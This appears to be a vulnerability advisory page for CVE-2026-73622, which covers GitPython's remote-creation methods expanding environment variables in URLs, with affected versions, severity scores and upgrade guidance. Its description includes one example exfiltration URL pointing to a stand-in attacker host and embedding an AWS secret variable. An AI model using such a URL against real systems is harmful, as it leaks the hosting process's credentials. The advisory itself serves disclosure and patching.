GitPython: Environment-variable exfiltration via Repo.create_remote() / Remote.add() URL (incomplete fix of GHSA-rwj8-pgh3-r573)
CVE-2026-73622GHSA-94p4-4cq8-9g67
What to do
Vendor fix available. Upgrade each affected package to the fixed version on its release line (gitpython 3.1.55), redeploy, then verify what is actually installed.
This page has no inventory attached, so it cannot say whether you are affected. A vendor fix is not proof that your deployment is fixed.
Affected packages
PyPI gitpython
- Affected
- < 3.1.55
- Fixed in
- 3.1.55
Sources
- Open Source Vulnerabilities (OSV.dev), including the GitHub Advisory Database
OSV record GHSA-94p4-4cq8-9g67 lists affected ranges: PyPI gitpython >=0 <3.1.55 (fixed)
VerifiedObserved Structured OSV record; GitHub-reviewed advisory.
- GitHub Advisory Database and maintainer security advisories on GitHub
GitHub-reviewed advisory GHSA-94p4-4cq8-9g67 lists affected ranges: PyPI gitpython >=0 <3.1.55
VerifiedObserved Structured GitHub Advisory Database record (type=reviewed) from the GitHub REST API.
Severity and exploitation
- Exploitation
- No confirmed exploitation recorded. Patch Next marks exploitation only from CISA KEV.
- CVSS 4.0
- 8.7 · CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X · score source
- EPSS
- CVE-2026-73622: 0.51% estimated exploitation activity in the next 30 days; percentile 43.84 (FIRST EPSS, 2026-11-03). This is a model estimate, not proof of exploitation or customer exposure.
Source description
As published by the source; long descriptions are shortened.
Summary The fix for GHSA-rwj8-pgh3-r573 stopped Repo.clonefrom() from running caller-supplied URLs through os.path.expandvars(), but it guarded only that one caller. Remote.create() — reached from the public Repo.createremote() and its Remote.add() alias — still passes an attacker-influenceable URL through Git.polishurl() with the default expandvars=True. A URL such as http://attacker.example/${AWSSECRETACCESSKEY}/repo.git is expanded server-side to embed the hosting process's environment secret, written into .git/config, and then transmitted to the attacker's host on the next fetch/pull. This is the same primitive and same "import repository from URL" threat model the advisory describes, via the sibling caller the fix missed. Root Cause Fix commit 8ac5a305 added an expandvars parameter to Git.polishurl() (default True) and used expandvars=False only in Repo.clone() (git/repo/base.py:1455). The shared helper's dangerous default was left in place, and the other callers were not…
Dates and revisions
- Published by the source
- Last modified by the source
- Source last checked
- Revision 3 · amended ·
Amended from ghsa record GHSA-94p4-4cq8-9g67
- Revision 2 · amended ·
Reviewed OSV alias/range/CVSS4 correction; package source scopes and original publication preserved. No customer finding resolved.
- Revision 1 · created ·
Published from osv record GHSA-94p4-4cq8-9g67
Agent brief
Preview the exact text before you copy it. Commands are read-only suggestions; review them before running anything.
# Patch Next advisory brief: CVE-2026-73622 Advisory: GitPython: Environment-variable exfiltration via Repo.create_remote() / Remote.add() URL (incomplete fix of GHSA-rwj8-pgh3-r573) IDs: CVE-2026-73622, GHSA-94p4-4cq8-9g67 Record: https://patchnext.com/advisories/cve-2026-73622 (revision 3, source checked 26 Oct 2026, 13:54 UTC) Inventory: none attached. This brief comes from a public page and does not say whether any deployment is affected. Severity: High (CVSS 8.7) Exploitation: no confirmed exploitation recorded. Patch Next confirms exploitation only from CISA KEV. Vendor response: Vendor fix available; fixed versions by package: gitpython 3.1.55. A vendor fix does not mean a deployment is fixed. ## Affected components - PyPI gitpython: affected < 3.1.55; fixed in 3.1.55 ## Suggested inspection (read-only) - `python -m pip show gitpython`: prints the installed version. Run with the environment that serves production active. ## Supported action Upgrade each affected component to a fixed version on its release line. For a transitive dependency, upgrade the parent package or add an override or constraint, then regenerate the lockfile. Redeploy every environment that ran an affected version. ## Required regression checks - Run the test suite and a production build. - Exercise the features that depend on gitpython. - Repeat the inspection and confirm that only fixed versions remain installed. ## Rollback considerations - Keep the previous lockfile and deployment artifact. Rolling back reinstates the vulnerable version, so apply any documented mitigation while you fix forward. ## Unresolved questions - Which deployments run an affected version? - Exploitation status can change. Check again before lowering the priority. - Mark the work resolved only after the fixed version is verified in production. ## Sources - Verified: https://osv.dev/vulnerability/GHSA-94p4-4cq8-9g67 (OSV record GHSA-94p4-4cq8-9g67 lists affected ranges: PyPI gitpython >=0 <3.1.55 (fixed)) - Verified: https://github.com/advisories/GHSA-94p4-4cq8-9g67 (GitHub-reviewed advisory GHSA-94p4-4cq8-9g67 lists affected ranges: PyPI gitpython >=0 <3.1.55) Commands are suggestions: review each one before running it.
Loading voting…